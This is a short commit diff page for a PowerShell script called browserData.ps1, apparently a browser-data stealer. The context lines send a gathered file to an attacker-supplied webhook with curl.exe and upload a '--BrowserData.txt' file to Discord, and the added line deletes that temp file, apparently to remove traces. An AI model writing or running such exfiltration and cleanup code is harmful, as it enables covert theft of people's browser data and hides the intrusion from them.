Update browserData.ps1
This commit is contained in:
parent
7bc2239f76
commit
20a1577419
1 changed files with 1 additions and 1 deletions
|
@ -95,5 +95,5 @@ if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
|
||||||
if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\--BrowserData.txt}
|
if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\--BrowserData.txt}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
############################################################################################################################################################
|
############################################################################################################################################################
|
||||||
|
RI $env:TEMP/--BrowserData.txt
|
||||||
|
|
Loading…
Reference in a new issue